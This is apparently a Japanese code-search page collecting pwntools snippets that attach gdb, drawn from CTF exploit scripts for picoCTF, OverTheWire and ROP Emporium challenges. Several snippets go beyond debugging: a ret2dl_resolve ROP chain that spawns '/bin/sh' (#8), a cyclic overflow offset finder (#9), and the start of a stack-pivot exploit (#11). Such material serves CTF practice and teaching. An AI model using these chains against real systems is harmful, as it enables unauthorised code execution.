コード例 #1
0
def debug(r, bps, elf):
    script = (
        "set verbose on\n"  # set debug-file-directory /home/user/libs/glibc-2.27/debug
    )
    script += add_bps(r, bps, elf)
    print(script)
    gdb.attach(r, gdbscript=script)
コード例 #2
0
def set_bp(io, *args):
    gdbscript = ''
    for breakpoint in args:
        if type(breakpoint) == str:
            gdbscript += 'b %s\n' % breakpoint
            continue
        elif type(breakpoint) == tuple:
            addr, cmd_list = breakpoint
            assert type(cmd_list) == list

            bp_cmds = 'commands\n'
            bp_cmds += '\n'.join(cmd_list)
            bp_cmds += '\nend\n'
        else:
            addr = breakpoint
            bp_cmds = ''

        gdbscript += 'bp 0x%x\n%s' % (addr, bp_cmds)

    if args:
        gdbscript += 'c'

    try:
        gdb.attach(io, gdbscript)
    except AttributeError:
        # hack to fix libc docker containers
        pass
コード例 #3
0
def main():
    if args.GDB:
        p = process(binary, aslr=False)
        gdb.attach(p.pid)
    else:
        p = process(binary, aslr=False)

    p.recvuntil(END_OF_MENU)
    launch_attack(p)
コード例 #4
0
ファイル: leak.py プロジェクト: zlin61/cse545-f20-video 
def main():
    if args.GDB:
        # p = gdb.debug(binary, gdbscript=gs)
        p = process(binary, aslr=False)
        gdb.attach(p.pid)
    else:
        p = process(binary, aslr=False)

    p.recvuntil(END_OF_MENU)
    leak_libc(p)
コード例 #5
0
def attach(r):
    if LOCAL:
        # dbg_file = "libc/usr/lib/debug/.build-id/ce/17e023542265fc11d9bc8f534bb4f070493d30.debug"
        bkps = [
            # elf.symbols["main"],
        ]
        cmds = [
            # "heap-analysis-helper",
            # "format-string-helper",
            # gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]),
            # "bp * $_base() + 0x1337",
        ]
        gdb.attach(r,
                   '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
    return
コード例 #6
0
ファイル: solve.py プロジェクト: tesuji/ctf-writeups 
    def get_process(self, ld_preload=False, ld_linux=False):
        p = None
        if args.REMOTE:
            p = remote(self.host, self.port)
        else:
            env = {'LD_PRELOAD': self.libc_name} if ld_preload else None
            argv = []
            if ld_linux:
                argv.append(self.ld_linux_name)

            argv.append(self.elf_name)
            p = process(argv, env=env)
            if args.GDB:
                gdb.attach(p.pid, self.gdb_script)
        return p
コード例 #7
0
def get_process():
    r = None
    if args.REMOTE:
        HOME_DIR = os.environ['HOME']
        keyfile = os.path.join(HOME_DIR, '.ssh', 'id_rsa_picoctf')
        ExploitInfo.pico_shell = ssh(host='2018game.picoctf.com',
                                     user='******',
                                     keyfile=keyfile)
        r = ExploitInfo.pico_shell.process(ExploitInfo.name_on_shell)
    else:
        r = process('./%s' % ExploitInfo.name)
        if args.GDB:
            gdb.attach(r.pid, ExploitInfo.gdb)

    return r
コード例 #8
0
ファイル: exp.py プロジェクト: sung3r/ctf 
from pwn import gdb
from pwn import context
from time import sleep

r = process('./bof')
context.log_level = 'debug'
r.recv()

rop = ROP('./bof')
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)

buf += rop.call('read', 0, bss_base, 100)
## used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
gdb.attach(r)

r.send(buf)

sleep(15)

buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
print 'buf len  =' + str(len(buf))
## used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
コード例 #9
0
    ELF_LOADED = ELF(LOCAL_BIN)  # Extract data from binary
    ROP_LOADED = ROP(ELF_LOADED)  # Find ROP gadgets

elif REMOTESSH:
    ssh_shell = ssh('bandit0',
                    'bandit.labs.overthewire.org',
                    password='******',
                    port=2220)
    p = ssh_shell.process(REMOTE_BIN)  # start the vuln binary
    elf = ELF(LOCAL_BIN)  # Extract data from binary
    rop = ROP(elf)  # Find ROP gadgets

if GDB and not REMOTETTCP and not REMOTESSH:
    # attach gdb and continue
    # You can set breakpoints, for example "break *main"
    gdb.attach(P.pid, "b *main")

##########################
##### OFFSET FINDER ######
##########################

OFFSET = b""  #b"A"*264
if OFFSET == b"":
    gdb.attach(P.pid, "c")  #Attach and continue
    payload = cyclic(264)
    payload += b"AAAAAAAA"
    print(P.clean())
    P.sendline(payload)
    #x/wx $rsp -- Search for bytes that crashed the application
    #print(cyclic_find(0x63616171)) # Find the offset of those bytes
    P.interactive()
コード例 #10
0
def debug(proc):
    p = process(proc, level="debug")
    gdb.attach(p)
    return p
コード例 #11
0
ファイル: exploit.py プロジェクト: rmccarth/binexp 
from pwn import process, ELF, ROP, packing, context, gdb
context.log_level = 'critical'
# enable/disable aslr: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space, echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

e = ELF("pivot")
l = ELF("libpivot.so")
p = process(e.path)
r = ROP(e)
pid = gdb.attach(p) # opens a new shell for gdb debugging

rop_addr = p.recvuntil("> ").split(b":")[1].split(b"\n")[0].lstrip().decode()
print("pivot @: " + rop_addr)

'''
pop rax; ret
xchg rsp, rax; ret

allows us to set the stack pointer to anything we want. 


exploit logic:

1) set stack pointer to 0x7ffff7be4f10 using xchg

---rop chain---
2) call foothold_function - this updates its entry in the .got.plt table
3) alter .got.plt address of .got.plt to be the address of the ret2win function in libpivot:
- pop rax
- addr_of_plt_got_foothold_function
- mov rax, qword ptr [rax]
- pop rbp